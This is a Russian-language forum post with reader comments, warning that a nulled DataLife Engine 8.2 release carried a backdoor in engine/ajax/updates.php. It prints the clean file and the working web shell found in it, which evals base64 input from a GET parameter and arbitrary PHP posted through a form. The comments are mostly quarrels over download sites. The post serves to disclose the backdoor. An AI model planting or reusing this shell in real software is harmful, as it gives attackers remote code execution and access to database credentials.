Поиск по сайту
Вход на сайт
Обратите внимание
Топ-новости
Архив сайта
Апрель 2016 (1)
Апрель 2014 (1)
Ноябрь 2013 (1)
Октябрь 2013 (1)
Май 2013 (2)
Апрель 2013 (8)
Партнеры

seo-monster.ru - сервис проверки доменов
хочешь такой же информер? Информер ТИЦ и PR

Shell dle Null

Главная

Shell dle Null

Очень часто владельцы сайтов о dle перезаливают архивы с релизами dle со своими файлами. Любой пользователь может оказаться жертвой действий таких админов.


Автор статьи: Lion__
Информацию предоставил: lyapish
Shell был найден: в релизе dle 8.2 на сайте Dle[]in[]ua

Если вы скачали архив не с этого сайта, проверьте файл engine/ajax/updates.php

Оригинал должен быть такой:
<?php
/*
=====================================================
DataLife Engine - by SoftNews Media Group
-----------------------------------------------------
http://dle-news.ru/
-----------------------------------------------------
Copyright (c) 2004,2009 SoftNews Media Group
=====================================================
Данный код защищен авторскими правами
=====================================================
Файл: updates.php
-----------------------------------------------------
Назначение: Проверка на наличие новых версий
=====================================================
*/

@error_reporting(7);
@ini_set('display_errors', true);
@ini_set('html_errors', false);

define('DATALIFEENGINE', true);
define('ROOT_DIR', '../..');
define('ENGINE_DIR', '..');

include ENGINE_DIR.'/data/config.php';

if ($config['http_home_url'] == "") {

    $config['http_home_url'] = explode("engine/ajax/updates.php", $_SERVER['PHP_SELF']);
    $config['http_home_url'] = reset($config['http_home_url']);
    $config['http_home_url'] = "http://".$_SERVER['HTTP_HOST'].$config['http_home_url'];

}

require_once ENGINE_DIR.'/inc/include/functions.inc.php';


$selected_language = $config['langs'];

if (isset( $_COOKIE['selected_language'] )) {

    $_COOKIE['selected_language'] = totranslit( $_COOKIE['selected_language'], false, false );

    if (@is_dir ( ROOT_DIR . '/language/' . $_COOKIE['selected_language'] )) {
        $selected_language = $_COOKIE['selected_language'];
    }

}

require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';

$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];

@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);

$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);

if (!strlen($data)) echo $lang['no_update']; else echo $data;
?>


Если это не так замените на этот код

Пример найденного шелла

if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";}
eval(base64_decode($_GET['user_id']));
echo <<<HTML
<HTML><body><form action="" method="post">
<center><textarea name="text" rows="10" cols="100"></textarea>
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
HTML;
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));
}}


Помните! На сайте dle.net.ua вы можете скачать чистые релизы, без дыр!

У вас не ставится dle модуль или dle шаблон работает не правильно? Задайте вопрос на нашем форуме по DLE(Datalife Engine CMS) и Вам обязательно помогут!



Если появились вопросы по поводу Shell dle Null или Вы хотите высказаться, то пройдите регистрацию или авторизируйтесь и оставляйте комментарии.
#1 написал: Kot (6 февраля 2010 21:31)

Публикаций: 268
Комментариев: 600
Кто сказал что можно?
Да ладно, тут таких умельцев с сборками хватает, уже не раз ловилися.
am


--------------------
#2 написал: Nemix (7 февраля 2010 02:38)

Публикаций: 0
Комментариев: 0
мда... вот чертилы ... хорошо у меня лицухи везде ) Да парни кто там качал тому сочувствую )))))

А вообще надо создать сайт типа топа и там лохотронщиков типа DLE.in.ua опускать .... хотя так тоже с сети их не вывести ...
#3 написал: myst1cal (7 февраля 2010 04:06)

Публикаций: 0
Комментариев: 0
На то он и нулл. Доверяй, но проверяй. wink
#4 написал: Maxter (7 февраля 2010 08:24)

Публикаций: 0
Комментариев: 0
Ничего удивительного. Хоть и все чисто, но автору плюс, думаю многие будут неприятно удивлены.
#5 написал: vladimir (7 февраля 2010 17:06)

Публикаций: 263
Комментариев: 754
Так может не создатели dle.in.ua нуллили? Читайте кто делал нул, то того и пинайте.
#6 написал: Lion__ (7 февраля 2010 19:56)

Публикаций: 0
Комментариев: 0
согласен с Владимиром, дле.ин.юа хороший сайт и им нет толку таким заниматся, только репутацию портит...
#7 написал: FreeKill (7 февраля 2010 20:49)

Публикаций: 0
Комментариев: 0
Спасибо, у меня все ок)
#8 написал: Nemix (7 февраля 2010 23:46)

Публикаций: 0
Комментариев: 0
Я с вами согласен сайт у них норм .. постоянно новинки и практически каждый день но ..... Если делают релиз то и проверять его надо и там в администрации не лохи сидят которые в DLE полные ............. Так что тут уж в такие сказки я не верю ))))


Они дали себе хорошую рекомендацию так что многие теперь знают что для безопасности их проектов там лучше нечего не качать ...Плюс думаю что по любому кто то из них эту тему видел и согласитесь до сих пор опровержения никто не дал ... А молчание как говорится знак согласия ...
#9 написал: Maxter (8 февраля 2010 08:10)

Публикаций: 0
Комментариев: 0
Я лично видел на их сайте тему, где описывались все "какашки" в шаблонах neoks и всей их команды. Ради интереса через 2 часа глянул, и тема волшебным образом исчезла. Так что в чистоту и непорочность администрации я особо неверю. Это конечно мое мнение, никому ненавязываю. Шаблоны конечно несложно проверить, а вот такие хитрости, как эта , далеко некаждый обнаружить сможет.
#10 написал: Nemix (8 февраля 2010 15:05)

Публикаций: 0
Комментариев: 0
хааа... точно .... я помню когда они мутили это ... Да лохотронщики они что тут говорить ....
#11 написал: Slavynin (8 февраля 2010 16:49)

Публикаций: 0
Комментариев: 0
Это еще раз доказывает что дле.нет.юа лучший. Пусть у нас не частые обновления но они почти всегда качественные(я имею виду барыжье посты).
У нас на форуме свобода слова. Мы отвечаем даже на дебильные вопросы! am
#12 написал: Maxter (8 февраля 2010 16:54)

Публикаций: 0
Комментариев: 0
Slavynin,
wink
#13 написал: Nemix (8 февраля 2010 20:05)

Публикаций: 0
Комментариев: 0
Slavynin,

Да не ... какие проблемы то ... Конечно лучший ... Никакого борыжнечевства просто вы пропихиваете халяву с шеллами и всё ))))) Тут уже и доказывать нечего не надо ... Ладно раз пролетели ...два ... а тут уже у вас зачастило такое )))))


#14 написал: Lion__ (8 февраля 2010 21:39)

Публикаций: 0
Комментариев: 0
Я только тут и сижу, на ин.юа зарегён только из-за того что Zloy начал пускать про меня левые слухи за спиной
#15 написал: Maxter (9 февраля 2010 06:20)

Публикаций: 0
Комментариев: 0
Nemix,
Здесь тоже шеллами банчат? wassat
#16 написал: Nemix (9 февраля 2010 14:07)

Публикаций: 0
Комментариев: 0
Maxter,

Хм... Не помню такого ... Здесь наоборот сдают лохотронщиков ))))
#17 написал: Slavynin (9 февраля 2010 16:07)

Публикаций: 0
Комментариев: 0
Nemix,

А ты внимательно прочитал мое сообщение! Где ты видел что бы на дле.нет.юа были шелы! Вроде мы вам об этом сообщили! Спасибо Lion__.

Обоснуй свое сообщение, и точнее что в нем зашифровано!
#18 написал: Maxter (9 февраля 2010 16:24)

Публикаций: 0
Комментариев: 0
Цитата: Slavynin
Nemix,

А ты внимательно прочитал мое сообщение! Где ты видел что бы на дле.нет.юа были шелы! Вроде мы вам об этом сообщили! Спасибо Lion__.

Обоснуй свое сообщение, и точнее что в нем зашифровано!

Я поэтому и спросил его. Наверно парень перепутал просто, названия похожие. Кстати на 6dle тоже поднималась тема про шаблоны, и тоже быстрым образом исчезла. Только здесь на форуме и можно найти инфу.
#19 написал: Lion__ (9 февраля 2010 16:46)

Публикаций: 0
Комментариев: 0
ну вот, хоть будете знать где качать)
#20 написал: Nemix (10 февраля 2010 22:22)

Публикаций: 0
Комментариев: 0
Цитата: Slavynin
А ты внимательно прочитал мое сообщение! Где ты видел что бы на дле.нет.юа были шелы! Вроде мы вам об этом сообщили! Спасибо Lion__.

Обоснуй свое сообщение, и точнее что в нем зашифровано!




Вы для начала прочитайте о чём здесь вообще говорят )))

Автор статьи: Lion__
Информацию предоставил: lyapish
Shell был найден: в релизе dle 8.2 на сайте Dle[]in[]ua


На этом сайте вечные шеллы и я там не качал и качать нечего не буду )))) Это для школьников у которых с финансами туговато такие сайты и админы этих сайтов пользуются этим а у меня всё с лицензией так намного спокойней!

Они уже не раз палились с этим так что тут поидеи и обсуждать нечего ....
#21 написал: mpi123456 (11 февраля 2010 12:53)

Публикаций: 0
Комментариев: 0
_dle_in_ua_main_6469-vazhno_html они фикс этого шела давно выложели!
#22 написал: Lion__ (11 февраля 2010 12:59)

Публикаций: 0
Комментариев: 0
Обращаем Ваше внимание, что во всех релизах DLE 8.2 находился шел в файле

Что же шелла нет на других сайтах?
Спалились, вот и оправдываются
#23 написал: audigy (11 февраля 2010 13:49)

Публикаций: 0
Комментариев: 0
Хули вы пиздите dle.in.ua нормальный сайт не хуже этого!
У него посещалка даже больше этого!
#24 написал: Lion__ (13 февраля 2010 17:32)

Публикаций: 0
Комментариев: 0
а репутация меньше)
Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

Вверх